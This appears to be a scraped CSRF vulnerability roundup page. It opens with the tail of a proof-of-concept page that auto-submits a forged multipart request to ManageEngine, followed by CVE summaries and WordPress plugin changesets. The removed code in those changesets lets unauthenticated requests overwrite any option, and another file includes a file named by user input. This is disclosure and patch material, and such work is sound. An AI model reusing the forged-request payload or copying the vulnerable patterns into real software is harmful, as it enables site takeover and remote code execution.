              "-----------------------------14802732823662\r\n" + 
              "Content-Disposition: form-data; name=\"SELECT_LANGUAGE\"\r\n" + 
              "\r\n" + 
              "1\r\n" + 
              "-----------------------------14802732823662\r\n" + 
              "Content-Disposition: form-data; name=\"TIME_ZONE\"\r\n" + 
              "\r\n" + 
              "Asia/Muscat\r\n" + 
              "-----------------------------14802732823662\r\n" + 
              "Content-Disposition: form-data; name=\"DATE_TIME_FORMAT\"\r\n" + 
              "\r\n" + 
              "yyyy/MM/dd HH:mm:ss\r\n" + 
              "-----------------------------14802732823662\r\n" + 
              "Content-Disposition: form-data; name=\"THEME_COLOR\"\r\n" + 
              "\r\n" + 
              "green\r\n" + 
              "-----------------------------14802732823662--\r\n";
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
              aBody[i] = body.charCodeAt(i); 
            xhr.send(new Blob([aBody]));
          }
          submitRequest();
        </script>
      </body>
    </html>
    

In the following screenshot, observe that the application executes the jsp code on the server. ![](https://sahildhar.github.io/assets/images/ZVE-2021-2019/1.png)

****Recommendation**:**

Enforce the security configuration for the affected endpoint.

CVE-2021-44651: Zoho ManageEngine CloudSecurityPlus - Remote Code Execution via Security Misconfiguration · Sahil Dhar

Zoho ManageEngine M365 Manager Plus before Build 4419 allows remote command execution when updating proxy settings through the Admin ProxySettings and Tenant ProxySettings components.

CVE-2021-44650: Microsoft 365 management, reporting, and auditing - ManageEngine M365 Manager Plus

A vulnerability has been identified in COMOS (All versions < V10.4.1). The COMOS Web component of COMOS uses a flawed implementation of CSRF prevention. An attacker could exploit this vulnerability to perform Cross-Site-Request-Forgery attacks.

CVE-2021-37198

The PublishPress Capabilities WordPress plugin before 2.3.1, PublishPress Capabilities Pro WordPress plugin before 2.3.1 does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a result, unauthenticated attackers could update arbitrary blog options, such as the default role and make any new registered user with an administrator role.

Timestamp:

12/06/2021 04:40:59 PM (11 months ago)

kevinB

Message:

*   Fixed : Security issue
*   Fixed : PHP Notice on Capabilities screen

Release 2.3.1  

Location:

capability-manager-enhanced/trunk

Files:

  

*   capsman-enhanced.php (4 diffs)
*   includes/admin.php (1 diff)
*   includes/settings-handler.php (1 diff)
*   readme.txt (8 diffs)

**Legend:**

Unmodified

Added

Removed

*   **capability-manager-enhanced/trunk/capsman-enhanced.php**
    
    r2621618
    
    r2640161
    
     
    
    4
    
    4
    
     \* Plugin URI: https://publishpress.com/capability-manager/
    
    5
    
    5
    
     \* Description: Manage WordPress role definitions, per-site or network-wide. Organizes post capabilities by post type and operation.
    
    6
    
     
    
     \* Version: 2.3
    
     
    
    6
    
     \* Version: 2.3.1
    
    7
    
    7
    
     \* Author: PublishPress
    
    8
    
    8
    
     \* Author URI: https://publishpress.com/
    
    …
    
    …
    
     
    
    26
    
    26
    
     \* @license     GNU General Public License version 3
    
    27
    
    27
    
     \* @link        https://publishpress.com/
    
    28
    
     
    
     \* @version     2.3
    
     
    
    28
    
     \* @version     2.3.1
    
    29
    
    29
    
     \*/
    
    30
    
    30
    
    31
    
    31
    
    if (!defined('CAPSMAN\_VERSION')) {
    
    32
    
     
    
        define('CAPSMAN\_VERSION',           '2.3');
    
    33
    
     
    
        define('CAPSMAN\_ENH\_VERSION',       '2.3');
    
    34
    
     
    
        define('PUBLISHPRESS\_CAPS\_VERSION', '2.3');
    
     
    
    32
    
        define('CAPSMAN\_VERSION',           '2.3.1');
    
     
    
    33
    
        define('CAPSMAN\_ENH\_VERSION',       '2.3.1');
    
     
    
    34
    
        define('PUBLISHPRESS\_CAPS\_VERSION', '2.3.1');
    
    35
    
    35
    
    }
    
    36
    
    36
    
    …
    
    …
    
     
    
    146
    
    146
    
    if (
    
    147
    
    147
    
    ((defined('WP\_DEBUG') && defined('CAPSMAN\_INSTALL\_PERMISSIONS')) || (!cme\_is\_plugin\_active('press-permit-core.php') && !cme\_is\_plugin\_active('presspermit-pro.php')))
    
    148
    
     
    
    && !isset($\_GET\['pp-after-click'\])
    
     
    
    148
    
    && !isset( $\_GET\['pp-after-click'\])
    
    149
    
    149
    
    && !defined('CAPSMAN\_DISABLE\_PERMISSIONS\_PROMO')
    
    150
    
    150
    
    ) {
    
    …
    
    …
    
     
    
    157
    
    157
    
            ) {
    
    158
    
    158
    
                require\_once ( dirname(\_\_FILE\_\_) . '/includes-core/pp-capabilities-permissions.php' );
    
    159
    
     
    
            }
    
     
    
    159
    
        }
    
    160
    
    160
    
        });
    
    161
    
    161
    
    }
    
*   **capability-manager-enhanced/trunk/includes/admin.php**
    
    r2621618
    
    r2640161
    
     
    
    694
    
    694
    
                        }
    
    695
    
    695
    
     
    
    696
    
                        if (empty($caps\_manager\_postcaps\_section)) {
    
     
    
    697
    
                            $caps\_manager\_postcaps\_section = '';
    
     
    
    698
    
                        }
    
     
    
    699
    
    696
    
    700
    
                        do\_action('publishpress-caps\_manager\_postcaps\_section', compact('current', 'rcaps', 'pp\_metagroup\_caps', 'is\_administrator', 'default\_caps', 'custom\_types', 'defined', 'unfiltered', 'pp\_metagroup\_caps','caps\_manager\_postcaps\_section', 'active\_tab\_id'));
    
    697
    
    701
    
*   **capability-manager-enhanced/trunk/includes/settings-handler.php**
    
    r2589382
    
    r2640161
    
     
    
    8
    
    8
    
    9
    
    9
    
    add\_action('init', function() {
    
    10
    
     
    
    11
    
     
    
        if (!empty($\_POST\['all\_options'\])) {
    
    12
    
     
    
            foreach(explode(',', $\_POST\['all\_options'\]) as $option\_name) {
    
    13
    
     
    
                $value = isset($\_POST\[$option\_name\]) ? $\_POST\[$option\_name\] : '';
    
    14
    
     
    
    15
    
     
    
                if (!is\_array($value)) {
    
    16
    
     
    
                    $value = trim($value);
    
    17
    
     
    
                }
    
    18
    
     
    
    19
    
     
    
                update\_option($option\_name, stripslashes\_deep($value));
    
    20
    
     
    
            }
    
     
    
    10
    
        if (wp\_verify\_nonce($\_REQUEST\['\_wpnonce'\], 'pp-capabilities-settings') && current\_user\_can('manage\_capabilities')) {
    
     
    
    11
    
            if (!empty($\_POST\['all\_options'\])) {
    
     
    
    12
    
                foreach(explode(',', $\_POST\['all\_options'\]) as $option\_name) {
    
     
    
    13
    
                    foreach (\['cme\_', 'capsman', 'pp\_capabilities'\] as $prefix) {
    
     
    
    14
    
                        if (0 === strpos($option\_name, $prefix)) {
    
     
    
    15
    
                            $value = isset($\_POST\[$option\_name\]) ? $\_POST\[$option\_name\] : '';
    
     
    
    16
    
       
    
     
    
    17
    
                            if (!is\_array($value)) {
    
     
    
    18
    
                                $value = trim($value);
    
     
    
    19
    
                            }
    
     
    
    20
    
                           
    
     
    
    21
    
                            update\_option($option\_name, stripslashes\_deep($value));
    
     
    
    22
    
                        }
    
     
    
    23
    
                    }
    
     
    
    24
    
                }
    
     
    
    25
    
            }
    
     
    
    26
    
       
    
     
    
    27
    
            do\_action('pp-capabilities-update-settings');
    
    21
    
    28
    
        }
    
    22
    
     
    
    23
    
     
    
        do\_action('pp-capabilities-update-settings');
    
    24
    
    29
    
    });
    
*   **capability-manager-enhanced/trunk/readme.txt**
    
    r2621618
    
    r2640161
    
     
    
    8
    
    8
    
    Tested up to: 5.8
    
    9
    
    9
    
    Requires PHP: 5.6.20
    
    10
    
     
    
    Stable tag: 2.3
    
     
    
    10
    
    Stable tag: 2.3.1
    
    11
    
    11
    
    License: GPLv3
    
    12
    
    12
    
    License URI: https://www.gnu.org/licenses/gpl-3.0.html
    
    …
    
    …
    
     
    
    48
    
    48
    
    49
    
    49
    
    Many WordPress users have sites with custom post types. This can be done using custom code, a theme, or with a plugin. No matter how your post type is created, PublishPress Capabilities lets you enforce and assign distinct capabilities for your post type.
    
     
    
    50
    
    50
    
    51
    
    \[Click here to see how to control post type permissions\](https://publishpress.com/knowledge-base/custom-post-types-capability/).
    
    51
    
    52
    
    …
    
    …
    
     
    
    66
    
    67
    
    67
    
    68
    
    Every time you change your permissions, the PublishPress Capabilities plugin will now automatically create a backup. If you make a mistake, go to the "Backup" menu link and you'll be able to roll back to a previous version.
    
     
    
    69
    
    68
    
    70
    
    \[Click here to see how to backup permissions\](https://publishpress.com/knowledge-base/backup-restore-permissions/).
    
    69
    
    71
    
    …
    
    …
    
     
    
    71
    
    73
    
    72
    
    74
    
    With PublishPress Capabilities you can create or copy any existing WordPress user role. These roles can be customized in exactly the same way as the default WordPress roles. These new roles can be added to single sites or to an entire multisite network.
    
     
    
    75
    
    73
    
    76
    
    \[Click here to see how to create or copy user roles\](https://publishpress.com/knowledge-base/create-or-copy-user-roles/).
    
    74
    
    77
    
    …
    
    …
    
     
    
    88
    
    91
    
    89
    
    92
    
    PublishPress Capabilities enables you to decide who can upload, edit and delete files from your site's Media Library. By default, only Administrators are able to delete files in your Media Library. Subscribers and Contributors are not even allowed to upload files. You can customize these permissions for the Media Library and also the Featured Image box.
    
     
    
    93
    
    90
    
    94
    
    \[Click here to learn about Media Library permissions\](https://publishpress.com/knowledge-base/control-media-library-access/).
    
    91
    
    95
    
    …
    
    …
    
     
    
    93
    
    97
    
    94
    
    98
    
    We mentioned earlier that PublishPress Capabilities has special support for WooCommerce taxonomies. This is true for the rest of WooCommerce also. With PublishPress Capabilities you can control permissions for WooCommerce products, orders and coupons.
    
     
    
    99
    
    95
    
    100
    
    \[Click here to learn about WooCommerce permissions\](https://publishpress.com/knowledge-base/woocommerce-permissons/).
    
    96
    
    101
    
    …
    
    …
    
     
    
    98
    
    103
    
    99
    
    104
    
    PublishPress Capabilities allows you to control permissions on a single site or across your whole network. Every time you update permissions in PublishPress Capabilities, you can choose to sync those changes across your multisite network.
    
     
    
    105
    
    100
    
    106
    
    \[Click here to learn about multisite permissions\](https://publishpress.com/knowledge-base/multisite-network/).
    
    101
    
    107
    
    …
    
    …
    
     
    
    150
    
    156
    
    Fixed : Non-administrators with user editing capabilities could add new Administrators
    
    151
    
    157
    
     
    
    158
    
    \= 2.3.1 =
    
     
    
    159
    
    Fixed : Security issue. Please update.
    
     
    
    160
    
    152
    
    161
    
    \== Changelog ==
    
     
    
    162
    
     
    
    163
    
    \= 2.3.1 - 6 Dec 2021 =
    
     
    
    164
    
      \* Fixed : Security issue
    
     
    
    165
    
      \* Fixed : PHP Notice on Capabilities screen
    
    153
    
    166
    
    154
    
    167
    
    \= 2.3 - 28 Oct 2021 =
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2021-25032: Changeset 2640161 – WordPress Plugin Repository

The Modal Window WordPress plugin before 5.2.2 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.

CVE-2021-25051

The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.

**button-generation/trunk/Readme.txt**

r2640129

r2641639

 

6

6

Tested up to: 5.8

7

7

Requires PHP: 5.3

8

 

Stable tag: 2.3.2

 

8

Stable tag: 2.3.3

9

9

License: GPLv2 or later

10

10

License URI: http://www.gnu.org/licenses/gpl-2.0.html

…

…

 

51

51

52

52

\== Changelog ==

 

53

\= 2.3.3 =

 

54

\* Fixed: minor buf on plugin main page

 

55

53

56

\= 2.3.2 =

54

57

\* Fixed: fixed minor bug;

**button-generation/trunk/button-generation.php**

r2640129

r2641639

 

4

4

 \*  Plugin URI:        https://wordpress.org/plugins/button-generation/

5

5

 \*  Description:       Easy generation of custom buttons.

6

 

 \*  Version:           2.3.2

 

6

 \*  Version:           2.3.3

7

7

 \*  Author:            Wow-Company

8

8

 \*  Author URI:        https://wow-estore.com/

…

…

 

69

69

                        'prefix'    => self::PREF, // Prefix for database

70

70

                        'text'      => 'button\_generator',    // Text domain for translate files

71

 

                        'version'   => '2.3.2', // Current version of the plugin

 

71

                        'version'   => '2.3.3', // Current version of the plugin

72

72

                        'file'      => \_\_FILE\_\_, // Main file of the plugin

73

73

                        'slug'      => dirname( plugin\_basename( \_\_FILE\_\_ ) ), // Name of the plugin folder

**button-generation/trunk/includes/about/main.php**

r2422113

r2641639

 

17

17

?>

18

18

<style>

19

 

  .about-wrap .wow-badge {

20

 

    position: absolute;

21

 

    top: 0;

22

 

    right: 0;

23

 

  }

 

19

    .about-wrap .wow-badge {

 

20

        position: absolute;

 

21

        top: 0;

 

22

        right: 0;

 

23

    }

24

24

25

 

  .wow-badge {

26

 

    background: url(<?php echo esc\_url( $logo );?>) center 15px no-repeat #1f9ef8;

27

 

    background-size: 100px 100px;

28

 

    color: #ffffff;

29

 

    font-size: 14px;

30

 

    text-align: center;

31

 

    font-weight: 600;

32

 

    margin: 5px 0 0;

33

 

    padding-top: 120px;

34

 

    height: 40px;

35

 

    display: inline-block;

36

 

    width: 140px;

37

 

    text-rendering: optimizeLegibility;

38

 

    box-shadow: 0 1px 3px rgba(0, 0, 0, .2);

39

 

  }

 

25

    .wow-badge {

 

26

        background: url(<?php echo esc\_url( $logo );?>) center 15px no-repeat #1f9ef8;

 

27

        background-size: 100px 100px;

 

28

        color: #ffffff;

 

29

        font-size: 14px;

 

30

        text-align: center;

 

31

        font-weight: 600;

 

32

        margin: 5px 0 0;

 

33

        padding-top: 120px;

 

34

        height: 40px;

 

35

        display: inline-block;

 

36

        width: 140px;

 

37

        text-rendering: optimizeLegibility;

 

38

        box-shadow: 0 1px 3px rgba(0, 0, 0, .2);

 

39

    }

40

40

41

 

  .wow-subscribe {

42

 

    padding: 5px 7px;

43

 

    border-radius: 5px;

44

 

    border: 1px solid #ccc;

45

 

    text-decoration: none;

46

 

    font-size: 14px;

47

 

    line-height: 14px;

48

 

    color: #999;

49

 

  }

 

41

    .wow-subscribe {

 

42

        padding: 5px 7px;

 

43

        border-radius: 5px;

 

44

        border: 1px solid #ccc;

 

45

        text-decoration: none;

 

46

        font-size: 14px;

 

47

        line-height: 14px;

 

48

        color: #999;

 

49

    }

50

50

51

 

  .wow-subscribe::before {

52

 

    font-family: dashicons;

53

 

    font-size: 12px;

54

 

    line-height: 14px;

55

 

  }

 

51

    .wow-subscribe::before {

 

52

        font-family: dashicons;

 

53

        font-size: 12px;

 

54

        line-height: 14px;

 

55

    }

56

56

57

 

  .button-pro {

58

 

    vertical-align: top;

59

 

    display: inline-block;

60

 

    text-decoration: none;

61

 

    font-size: 13px;

62

 

    line-height: 26px;

63

 

    height: 28px;

64

 

    margin: 0;

65

 

    padding: 0 10px 1px;

66

 

    cursor: pointer;

67

 

    border-width: 0;

68

 

    border-style: solid;

69

 

    \-webkit-appearance: none;

70

 

    \-webkit-border-radius: 3px;

71

 

    border-radius: 3px;

72

 

    white-space: nowrap;

73

 

    \-webkit-box-sizing: border-box;

74

 

    \-moz-box-sizing: border-box;

75

 

    box-sizing: border-box;

76

 

    color: #fff !important;

77

 

    background: #37c781;

78

 

  }

 

57

    .button-pro {

 

58

        vertical-align: top;

 

59

        display: inline-block;

 

60

        text-decoration: none;

 

61

        font-size: 13px;

 

62

        line-height: 26px;

 

63

        height: 28px;

 

64

        margin: 0;

 

65

        padding: 0 10px 1px;

 

66

        cursor: pointer;

 

67

        border-width: 0;

 

68

        border-style: solid;

 

69

        \-webkit-appearance: none;

 

70

        \-webkit-border-radius: 3px;

 

71

        border-radius: 3px;

 

72

        white-space: nowrap;

 

73

        \-webkit-box-sizing: border-box;

 

74

        \-moz-box-sizing: border-box;

 

75

        box-sizing: border-box;

 

76

        color: #fff !important;

 

77

        background: #37c781;

 

78

    }

79

79

80

 

  .button-pro:hover {

81

 

    background: #303030;

82

 

  }

 

80

    .button-pro:hover {

 

81

        background: #303030;

 

82

    }

83

83

84

 

  .button-pro:active {

85

 

    background: #303030;

86

 

  }

87

 

  .wow-thank-you {

88

 

    color: #777777;

89

 

    font-style: italic;

90

 

  }

 

84

    .button-pro:active {

 

85

        background: #303030;

 

86

    }

 

87

 

88

    .wow-thank-you {

 

89

        color: #777777;

 

90

        font-style: italic;

 

91

    }

 

92

91

93

    .about-wrap {

92

 

        margin: 0 auto;

 

94

        margin: 0 auto 3rem;

93

95

    }

94

96

</style>

…

…

 

96

98

97

99

<div class="wrap full-width-layout">

98

 

<div class="about-wrap">

 

100

    <div class="about-wrap">

99

101

100

102

101

 

  <h1><?php esc\_attr\_e( 'Welcome', $this->text\_domain ); ?> </h1>

 

103

        <h1><?php esc\_attr\_e( 'Welcome', $this->text\_domain ); ?> </h1>

102

104

103

 

  <p class="about-text">

104

 

        <?php esc\_attr\_e( 'Congratulations! You are about to use one of the plugins from Wow-Company.', $this->text\_domain ); ?> </p>

105

 

  <p>

106

 

    <a href="https://www.facebook.com/wowaffect/" class="wow-subscribe" target="\_blank">Stay in touch <span

107

 

        class="dashicons dashicons-facebook-alt"></span></a>

108

 

  </p>

109

 

  <span class="wow-badge">Wow-Company</span>

110

 

</div>

111

 

    <?php

112

 

    $current = ( isset( $\_GET\['tab'\] ) ) ? sanitize\_text\_field( wp\_unslash( $\_GET\['tab'\] ) ) : 'wow-plugins';

113

 

    $tabs    = array(

114

 

        'wow-plugins' => \_\_( 'Plugins', $this->text\_domain ),

 

105

        <p class="about-text">

 

106

            <?php esc\_attr\_e( 'Congratulations! You are about to use one of the plugins from Wow-Company.', $this->text\_domain ); ?>

 

107

        </p>

 

108

        <p>Several plugins below has free and pro versions you can install it and hopefully useful. Enjoy it.</p>

 

109

        <span class="wow-badge">Wow-Company</span>

 

110

    </div>

 

111

    <div class="stem-content">

 

112

        <?php include( 'wow-plugins.php' ); ?>

 

113

    </div>

115

114

116

 

    );

117

 

118

 

    echo '<h2 class="nav-tab-wrapper wp-clearfix">';

119

 

    foreach ( $tabs as $tab => $name ) {

120

 

        $class = ( $tab === $current ) ? ' nav-tab-active' : '';

121

 

        echo '<a class="nav-tab' . esc\_attr( $class ) . '" href="?page=wow-company&tab=' . esc\_attr( $tab ) . '">' .

122

 

             esc\_attr( $name ) . '</a>';

123

 

    }

124

 

    echo '</h2>';

125

 

126

 

    echo '<div class="stem-content">';

127

 

    include( $current . '.php' );

128

 

    echo '</div>';

129

 

    ?>

130

115

</div>

131

116

**button-generation/trunk/includes/about/wow-plugins.php**

r2422113

r2641639

 

71

71

  }

72

72

</style>

73

 

<h3>Several plugins below has free and pro versions you can install it and hopefully useful. Enjoy it.</h3>

 

73

74

74

75

75

<div class="theme-browser">

Tag

#csrf